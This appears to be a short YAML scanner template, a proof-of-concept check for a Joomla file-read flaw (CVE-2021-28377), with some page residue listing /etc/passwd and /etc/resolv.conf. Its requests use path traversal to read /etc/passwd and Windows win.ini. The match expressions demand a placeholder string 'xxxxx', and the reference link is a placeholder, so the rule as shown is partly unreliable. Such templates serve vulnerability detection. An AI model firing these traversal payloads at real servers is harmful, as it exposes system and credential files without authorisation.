name: poc-yaml-joomla-cve-2021-28377-fileread manual: true transport: http rules: r0: request: cache: true method: GET path: /index.php?f=../../../../../../../etc/passwd expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) && response.body_string.contains("xxxxx") r1: request: cache: true method: GET path: /index.php?f=../../../../../../../Windows/win.ini expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body_string.contains("xxxxx") expression: r0() || r1() detail: author: Chaitin links: - http://example.com
读取文件
/etc/resolv.conf
/etc/passwd
Was this page helpful?